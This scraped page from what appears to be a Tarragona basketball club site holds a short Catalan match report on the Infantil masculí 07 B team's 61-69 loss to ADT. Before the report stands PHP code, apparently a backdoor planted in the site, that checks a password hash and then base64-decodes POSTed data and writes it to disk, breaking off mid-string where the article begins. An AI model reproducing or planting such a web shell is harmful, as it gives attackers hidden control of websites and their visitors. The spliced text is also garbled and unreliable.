function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un mal tercer quart allunya de la victòria l'Infantil masculí 07 B davant l'ADT (61-69) - Tgn Bàsquet Club -

Un mal tercer quart allunya de la victòria l’Infantil masculí 07 B davant l’ADT (61-69)

Updated: abril 20, 2021

L’equip Infantil masculí 07 B del TGN Bàsquet va perdre contra l’ADT un partit que tenia controlat fins a la mitja part. La bona defensa i el domini en el rebot van permetre els locals arribar al descans amb un marcador favorable de 34-27, però a la represa, un parcial de 2-12 dels de Torreforta en la segona meitat del tercer quart va canviar la dinàmica del matx. El TGN Bàsquet va intentar reaccionar, però no ho va aconseguir.